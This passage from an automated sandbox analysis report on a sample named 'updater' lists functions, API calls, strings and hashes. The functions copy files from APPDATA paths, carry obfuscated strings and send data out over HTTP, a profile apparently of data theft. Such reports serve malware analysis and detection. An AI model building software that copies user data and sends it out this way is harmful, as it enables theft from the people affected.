
Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

InternetCloseHandle.WININET(~a}z), ref: 013DC7E8
InternetCloseHandle.WININET(?), ref: 013DC7ED
InternetCloseHandle.WININET(?), ref: 013DC7F2

Strings

~a}z, xrefs: 013DC5B4
[^BAOJK\., xrefs: 013DC4A4

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Internet$CriticalSection$CloseHandle$EnterLeaveOpen$ConditionConnectHttpRequestVariableWake
String ID: [^BAOJK\.$~a}z
API String ID: 3302835935-3567702361
Opcode ID: bb180a53aeba31f9b209122fa84d0f31d65bd3ae86af45c09118dbc070cf0598
Instruction ID: e41fb2397974735f01c1af37543ad5da183f466f72dae8e1f5df3f9ba2a8b41f
Opcode Fuzzy Hash: bb180a53aeba31f9b209122fa84d0f31d65bd3ae86af45c09118dbc070cf0598
Instruction Fuzzy Hash: B9B156B2D042459FDF15DFB8E848AADBBB5FF2521CF29111EE0516B2B1CB701882CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01433A19 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01433A9B
_free.LIBCMT ref: 01433ABF
_free.LIBCMT ref: 01433C4C
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0144E0E8), ref: 01433C5E
_free.LIBCMT ref: 01433E18

Strings

Pacific Standard Time, xrefs: 01433CCD
Pacific Daylight Time, xrefs: 01433CFC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 597776487-1154798116
Opcode ID: c562e7ad8317d9d93ee54ebe5218aff0cbb88108748861cd0e135a71892eed99
Instruction ID: c2bea9526d2e208dc95aca3579050969e85491ac89eb2f8127dd6cc244f87ab4
Opcode Fuzzy Hash: c562e7ad8317d9d93ee54ebe5218aff0cbb88108748861cd0e135a71892eed99
Instruction Fuzzy Hash: 5AC14A719002069FDB299F6DD840AAA7BB9FFA9214F14415FE590DB372E7348E42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013CE85F Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 294fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

CopyFileA.KERNEL32 ref: 013CEB81

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

rYOBBKZJOZ., xrefs: 013CE971
rYOB, xrefs: 013CEBAA
JOZ., xrefs: 013CEBB8
(\;, xrefs: 013CEC16
JOZ., xrefs: 013CE93F
BKZ, xrefs: 013CEBB1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$BKZ$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
API String ID: 265086031-507006662
Opcode ID: 5d0740080deee1ac9f1a9e1a6735847d400c3668d93845b192b411c73e8fb8de
Instruction ID: e25b5ebb4ba1f9c7b2579173f0899a9af0cba0f1d349d28ae8045aa09b54a540
Opcode Fuzzy Hash: 5d0740080deee1ac9f1a9e1a6735847d400c3668d93845b192b411c73e8fb8de
Instruction Fuzzy Hash: 81C10431D0028ADEDF14EBA8D844BDDBFB4BF25708F24419ED5567B2A1DB701A49CB12

Uniqueness

Uniqueness Score: -1.00%

Function 013DC2CA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94networkfileCOMMON

Download Yara Rule

APIs

HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 013DC368
InternetWriteFile.WININET(?,?,?,?), ref: 013DC37D
InternetWriteFile.WININET(?,?,?,?), ref: 013DC388
InternetWriteFile.WININET(?,?,00000010,?), ref: 013DC395
HttpEndRequestA.WININET(?,00000000,00000000,00000000), ref: 013DC39E

Strings

(, xrefs: 013DC352

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FileInternetWrite$HttpRequest$Send
String ID: (
API String ID: 2326806561-3887548279
Opcode ID: db8bd83ab14e505559ba86fb347a68b15823414f22a341eaf73aacacdaaebb34
Instruction ID: ac5be5abd8f2d86b151712b3915e4d4a2e776d6bba83e2b6db9bee3a601b80f3
Opcode Fuzzy Hash: db8bd83ab14e505559ba86fb347a68b15823414f22a341eaf73aacacdaaebb34
Instruction Fuzzy Hash: 4B311CB2D04219AFDB15DFA8DC84AEEBFB8FF48304F14842EE516A7251D7359605CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0142F9B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0142FA0F
ext-ms-, xrefs: 0142FA23

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 1eeb35443d57e11aeda2f39f7e9d375539900f7c167ebfa20e99ff90431df2c0
Instruction ID: c42aacc9d6e658eee8bd831686d3b3e85ca2d0c450402d6e0289119ff8e0c44a
Opcode Fuzzy Hash: 1eeb35443d57e11aeda2f39f7e9d375539900f7c167ebfa20e99ff90431df2c0
Instruction Fuzzy Hash: 6A21D576A01231ABDF328B289C80A1B7BB8AF057A0FD50516ED05A73B5E730DD49C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 013CE23E Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 416fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

CopyFileA.KERNEL32 ref: 013CE687

Strings

APPDATA, xrefs: 013CE391
BKZ., xrefs: 013CE415
rLWZKMAG@., xrefs: 013CE358
(\;, xrefs: 013CE701

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$APPDATA$BKZ.$rLWZKMAG@.
API String ID: 265086031-61289390
Opcode ID: 16fe0ee3b98ae1f2a127a09bf26a785175073b93e50346becfbe0aa45a528ceb
Instruction ID: aa7e5dca6a35a05076d079e59a217ece9ceba0a2bf8ff6a816b78522f1890fea
Opcode Fuzzy Hash: 16fe0ee3b98ae1f2a127a09bf26a785175073b93e50346becfbe0aa45a528ceb
Instruction Fuzzy Hash: 1A027A31D00259DEDF25EBA8D990BDDBBB4AF25308F2041AED4467B291DB741E48CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013CF1A2 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 342fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

CopyFileA.KERNEL32 ref: 013CF4EB

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

., xrefs: 013CF298
APPDATA, xrefs: 013CF2F4
r., xrefs: 013CF34C
(\;, xrefs: 013CF563

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$.$APPDATA$r.
API String ID: 265086031-561754209
Opcode ID: be7e0b4deaa5060b1d569166766f92009975515cad786a2c1e3a61a3f174af58
Instruction ID: 23e7cd076f38e8eaa72af7b9651e8dabb7b26b4e31be1edbce0090f5cd6b9854
Opcode Fuzzy Hash: be7e0b4deaa5060b1d569166766f92009975515cad786a2c1e3a61a3f174af58
Instruction Fuzzy Hash: 97E1AE31D0024ADEDF15EBA8D990BEDBBB4AF24308F2441AED41677291DB706F49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013E4C21 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 294COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013E4CC9

Strings

-stmtjrnl, xrefs: 013E4E82
-journal, xrefs: 013E4E64
:memory:, xrefs: 013E4C80

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: -journal$-stmtjrnl$:memory:
API String ID: 4218353326-2512898500
Opcode ID: 0d602fe9080de05961a04fd1e59daa3d1c122a1b412db522f5daac9297f5d1d6
Instruction ID: 46d2e53dbcd04d3c9b56de0dda04aaac2f1adecec9c2f0c21a983f62d35cf2a1
Opcode Fuzzy Hash: 0d602fe9080de05961a04fd1e59daa3d1c122a1b412db522f5daac9297f5d1d6
Instruction Fuzzy Hash: 8BB1CD71A007169FDB25DFADC844AAABBF1EF58308F14482EE59AE7781D631E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0142215E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,0142221F,?,?,01464064,00000000,?,0142234A,00000004,InitializeCriticalSectionEx,0144BC58,0144BC60,00000000), ref: 014221EE

Strings

api-ms-, xrefs: 014221AE

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: aefbb7b3295f61ed4ae9241429641a22a9e57227c40012071bde908d29fa27c0
Instruction ID: 6fb9140d7d7373d560562d1fb1d042d9f788600f6f8951301199674af754aa8e
Opcode Fuzzy Hash: aefbb7b3295f61ed4ae9241429641a22a9e57227c40012071bde908d29fa27c0
Instruction Fuzzy Hash: D811A03AA01235ABDF324B6CAC40F6A77A4BF05760F650512EF10E73A4DBB0E98186D1

Uniqueness

Uniqueness Score: -1.00%

Function 014314B3 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 01431537
__alloca_probe_16.LIBCMT ref: 014315FD
__freea.LIBCMT ref: 01431669

Part of subcall function 0143255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E

__freea.LIBCMT ref: 01431672
__freea.LIBCMT ref: 01431695

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: f93800efb52291702c8413004776dd618b779e0dc333c9c64ad2ce5fa99b97fe
Instruction ID: d4710a14cf5aab5b304d0906183aeee3143965c0c4eb0bdd58084ded1e42680b
Opcode Fuzzy Hash: f93800efb52291702c8413004776dd618b779e0dc333c9c64ad2ce5fa99b97fe
Instruction Fuzzy Hash: 2B51B972500217AFFB219FA9DC40EBB3BA9EFD9A50F19012BFD0997260D770DC5196A0

Uniqueness

Uniqueness Score: -1.00%

Function 013FDCBF Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 013FCC8A: _strlen.LIBCMT ref: 013FCCB1

_strlen.LIBCMT ref: 013FE07E

Strings

sqlite_subquery_%p_, xrefs: 013FDD32
, xrefs: 013FE0B4
%s.%s, xrefs: 013FE064

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: $%s.%s$sqlite_subquery_%p_
API String ID: 4218353326-1950918665
Opcode ID: 165251b440d265142d5d96c6a5ce2a3ce2514d922ce09ff14abc3a783be980d2
Instruction ID: c92b60f812fb2e1ce8d2d51b822ac4e7f7c3cf39ae63193a061457b995051522
Opcode Fuzzy Hash: 165251b440d265142d5d96c6a5ce2a3ce2514d922ce09ff14abc3a783be980d2
Instruction Fuzzy Hash: B6026E71E0020A9FDB15CFA9C884BAEBBF2FF54318F25856DD605AB361D734A841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013CECB9 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 341fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

CopyFileA.KERNEL32 ref: 013CEFFE

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

r., xrefs: 013CEE5F
APPDATA, xrefs: 013CEE07
(\;, xrefs: 013CF076

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$APPDATA$r.
API String ID: 265086031-3718514597
Opcode ID: 9e6d035453d78e6b7db862d080edc344fcb31c28262a13e9fc730e9109b2d491
Instruction ID: 5d3e77d2fac7800d26920c2b4ec851631c69b2ac11cd34abf9e514c46dac1294
Opcode Fuzzy Hash: 9e6d035453d78e6b7db862d080edc344fcb31c28262a13e9fc730e9109b2d491
Instruction Fuzzy Hash: A7E19D31D0028ADEDF15EBA8C890BEDBBB4AF25308F2441AED41577291DB706F89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013CD397 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 336fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

CopyFileA.KERNEL32 ref: 013CD6D8

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

APPDATA, xrefs: 013CD4E7
(\;, xrefs: 013CD753
ro\CA\Wr., xrefs: 013CD4AF

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$APPDATA$ro\CA\Wr.
API String ID: 265086031-9018626
Opcode ID: 2ee90c21514c72bf44f5a08dfab9cf974885f172a5827e958561523512ee2167
Instruction ID: 698fe44c86bb5772c599ee0cad2ad25ac571dee61e656a09b7ee34f486bf102f
Opcode Fuzzy Hash: 2ee90c21514c72bf44f5a08dfab9cf974885f172a5827e958561523512ee2167
Instruction Fuzzy Hash: 77E17B31D0129ADEDF15EBA8D990BDDBBB4AF24308F20809ED5467B291DB705F48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013DAA32 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 316COMMON

Download Yara Rule

APIs

Part of subcall function 013DA518: LoadLibraryA.KERNEL32(01465C78), ref: 013DA5B7
Part of subcall function 013DA518: GetProcAddress.KERNEL32(00000000,0146606C), ref: 013DA645

FreeLibrary.KERNEL32 ref: 013DAECC

Strings

]]YA, xrefs: 013DAD8C
., xrefs: 013DAD9A
., xrefs: 013DAB73

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: .$.$]]YA
API String ID: 145871493-2355798663
Opcode ID: 69a6da913a6e77c39027e7c17fb54f6fb24a38e5780ae3240851687bee80d745
Instruction ID: fb1129dbd145cffc9c56b8ccb4623a0db121ebf0b35faf355ff7173d88da0fe5
Opcode Fuzzy Hash: 69a6da913a6e77c39027e7c17fb54f6fb24a38e5780ae3240851687bee80d745
Instruction Fuzzy Hash: 7DD1DC72D0024ADFDF29EFE8E984BADBBB1BF15318F144099D055AB2A1CB705A45CB12

Uniqueness

Uniqueness Score: -1.00%

Function 013CFB09 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 314fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

CopyFileA.KERNEL32 ref: 013CFDDF

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Strings

rtMO]Fr., xrefs: 013CFC16
APPDATA, xrefs: 013CFC51
(\;, xrefs: 013CFE57

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: (\;$APPDATA$rtMO]Fr.
API String ID: 265086031-1862567354
Opcode ID: caa37040f5bc2ae169fd6ae904c385830f4c3060f395c15b6ac62977845a7377
Instruction ID: 7fe994dbfb65a276fc8027cd137f16409131bd14fdc2d441f3d59ac111eca68e
Opcode Fuzzy Hash: caa37040f5bc2ae169fd6ae904c385830f4c3060f395c15b6ac62977845a7377
Instruction Fuzzy Hash: 60D19931D04259DEDF14EBA8D890BEDBBB5AF25308F1440AED40A7B291DB701E89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013D2A28 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013D2B2C
_strlen.LIBCMT ref: 013D2B48

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
